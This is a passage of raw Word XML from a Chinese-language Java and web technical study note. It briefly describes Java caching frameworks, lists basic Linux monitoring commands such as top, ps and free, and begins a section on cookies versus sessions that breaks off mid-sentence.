          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t>    JBossCache/TreeCache JBossCache是一个复制的事务处理缓存，它允许你缓存企业级应用数据来更好的改善性能。缓存数据被自动复制，让你轻松进行Jboss服务器之间的集群工作。JBossCache能够通过Jboss应用服务或其他J2EE容器来运行一个Mbean服务，当然，它也能独立运行。 JBossCache包括两个模块：TreeCache和TreeCacheAOP。 TreeCache --是一个树形结构复制的事务处理缓存。 TreeCacheAOP --是一个“面向对象”缓存，它使用AOP来动态管理POJO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t>    OSCache OSCache标记库由OpenSymphony设计，它是一种开创性的JSP定制标记应用，提供了在现有JSP页面之内实现快速内存缓冲的功能。OSCache是个一个广泛采用的高性能的J2EE缓存框架，OSCache能用于任何Java应用程序的普通的缓存解决方案。OSCache有以下特点：缓存任何对象，你可以不受限制的缓存部分jsp页面或HTTP请求，任何java对象都可以缓存。 拥有全面的API--OSCache API给你全面的程序来控制所有的OSCache特性。 永久缓存--缓存能随意的写入硬盘，因此允许昂贵的创建（expensive-to-create）数据来保持缓存，甚至能让应用重启。 支持集群--集群缓存数据能被单个的进行参数配置，不需要修改代码。 缓存记录的过期--你可以有最大限度的控制缓存对象的过期，包括可插入式的刷新策略（如果默认性能不需要时）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t>    JCACHE JCACHE是一种即将公布的标准规范（JSR 107），说明了一种对Java对象临时在内存中进行缓存的方法，包括对象的创建、共享访问、假脱机（spooling）、失效、各JVM的一致性等。它可被用于缓存JSP内最经常读取的数据，如产品目录和价格列表。利用JCACHE，多数查询的反应时间会因为有缓存的数据而加快（内部测试表明反应时间大约快15倍）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t>    Ehcache Ehcache出自Hibernate，在Hibernate中使用它作为数据缓存的解决方案。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t>    Java Caching System JCS是Jakarta的项目Turbine的子项目。它是一个复合式的缓冲工具。可以将对象缓冲到内存、硬盘。具有缓冲对象时间过期设定。还可以通过JCS构建具有缓冲的分布式构架，以实现高性能的应用。 对于一些需要频繁访问而每访问一次都非常消耗资源的对象，可以临时存放在缓冲区中，这样可以提高服务的性能。而JCS正是一个很好的缓冲工具。缓冲工具对于读操作远远多于写操作的应用性能提高非常显著。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>    SwarmCache SwarmCache是一个简单而功能强大的分布式缓存机制。它使用IP组播来有效地在缓存的实例之间进行通信。它是快速提高集群式Web应用程序的性能的理想选择。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t>    ShiftOne ShiftOne Object Cache这个Java库提供了基本的对象缓存能力。实现的策略有先进先出（FIFO），最近使用（LRU），最不常使用（LFU）。所有的策略可以最大化元素的大小，最大化其生存时间。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t>    WhirlyCache Whirlycache是一个快速的、可配置的、存在于内存中的对象的缓存。它能够通过缓存对象来加快网站或应用程序的速度，否则就必须通过查询数据库或其他代价较高的处理程序来建立。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t>    Jofti Jofti可对在缓存层中(支持EHCache，JBossCache和OSCache)的对象或在支持Map接口的存储结构中的对象进行索引与搜索。这个框架还为对象在索引中的增删改提供透明的功能同样也为搜索提供易于使用的查询功能。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t>    cache4j cache4j是一个有简单API与实现快速的Java对象缓存。它的特性包括：在内存中进行缓存，设计用于多线程环境，两种实现：同步与阻塞，多种缓存清除策略：LFU, LRU, FIFO，可使用强引用(strong reference)与软引用(soft reference)存储对象。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t>    Open Terracotta 一个JVM级的开源群集框架，提供：HTTP Session复制，分布式缓存，POJO群集，跨越群集的JVM来实现分布式应用程序协调(采用代码注入的方式，所以你不需要修改任何)。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t>    sccache SHOP.COM使用的对象缓存系统。sccache是一个in-process cache和二级、共享缓存。它将缓存对象存储到磁盘上。支持关联Key，任意大小的Key和任意大小的数据。能够自动进行垃圾收集。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t>    Shoal Shoal是一个基于Java可扩展的动态集群框架，能够为构建容错、可靠和可用的Java应用程序提供了基础架构支持。这个框架还可以集成到不希望绑定到特定通信协议，但需要集群和分布式系统支持的任何Java产品中。Shoal是GlassFish和JonAS应用服务器的集群引擎。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t>    Simple-Spring-Memcached Simple-Spring-Memcached，它封装了对MemCached的调用，使MemCached的客户端开发变得超乎寻常的简单。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D6407" w:rsidRPr="00B43740" w:rsidRDefault="004D6407" w:rsidP="004102B4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC07A0" w:rsidRPr="00F41A4C" w:rsidRDefault="00BB566E" w:rsidP="00BB566E">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">5 </w:t>
      </w:r>
      <w:r w:rsidR="002662DE" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="002662DE" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>常用命令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC07A0" w:rsidRPr="00F41A4C" w:rsidRDefault="009A00BB" w:rsidP="00CC07A0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00CC07A0" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.1  linux</w:t>
      </w:r>
      <w:r w:rsidR="00CC07A0" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>如何查看负载</w:t>
      </w:r>
      <w:r w:rsidR="00DD2E83" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>、内存</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E3BE1" w:rsidRPr="00F41A4C" w:rsidRDefault="00244A61" w:rsidP="00CC07A0">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="008C7E9A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>puinfo</w:t>
      </w:r>
      <w:r w:rsidR="000E3BE1" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00F57476" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>了解</w:t>
      </w:r>
      <w:r w:rsidR="00F57476" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidR="00F57476" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E3BE1" w:rsidRPr="00F41A4C" w:rsidRDefault="000E3BE1" w:rsidP="00CC07A0">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A7F94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="008C7E9A" w:rsidRPr="001A7F94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>op</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="001A4B6B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>性能分析工具，能够实时显示系统中各个进程的资源占用状况</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C7E9A" w:rsidRPr="00F41A4C" w:rsidRDefault="000E3BE1" w:rsidP="00CC07A0">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A7F94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="008C7E9A" w:rsidRPr="001A7F94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00AA7538" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>性能分析工具，能够实时显示系统中各个进程的资源占用状况</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00096797" w:rsidRPr="00F41A4C" w:rsidRDefault="00096797" w:rsidP="00CC07A0">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>下查看进程使用内存的命令：</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7F94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>top</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7F94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7F94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>free</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00096797" w:rsidRPr="00F41A4C" w:rsidRDefault="00096797" w:rsidP="00CC07A0">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00096797" w:rsidRPr="00F41A4C" w:rsidRDefault="00096797" w:rsidP="00CC07A0">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A434A3" w:rsidRPr="00F41A4C" w:rsidRDefault="008A3FE1" w:rsidP="00A434A3">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00A434A3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.2  linux</w:t>
      </w:r>
      <w:r w:rsidR="00A434A3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>输出时间到文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C7E9A" w:rsidRPr="00F41A4C" w:rsidRDefault="00A434A3" w:rsidP="00CC07A0">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>输出系统时间到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>tmp.log(cal&gt; tmp.log)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC07A0" w:rsidRPr="00F41A4C" w:rsidRDefault="00CC07A0" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00606546" w:rsidRPr="00F41A4C" w:rsidRDefault="00CB6FBA" w:rsidP="00CB6FBA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">6 </w:t>
      </w:r>
      <w:r w:rsidR="00606546" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00606546" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>技术基</w:t>
      </w:r>
      <w:r w:rsidR="00606546" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>础</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD320E" w:rsidRPr="00F41A4C" w:rsidRDefault="00CD320E" w:rsidP="00CD320E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00184DF9" w:rsidRPr="00F41A4C" w:rsidRDefault="00CD320E" w:rsidP="00184DF9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00184DF9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">.1  </w:t>
      </w:r>
      <w:r w:rsidR="00BF343D" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>什么是</w:t>
      </w:r>
      <w:r w:rsidR="00824AAD" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="00824AAD" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00824AAD" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="00824AAD" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00824AAD" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidR="00824AAD" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00606546" w:rsidRPr="00F41A4C" w:rsidRDefault="00BF343D" w:rsidP="00DF57DB">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r w:rsidR="00824AAD" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="00824AAD" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是保存在客户端的一些用户输入，</w:t>
      </w:r>
      <w:r w:rsidR="00824AAD" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
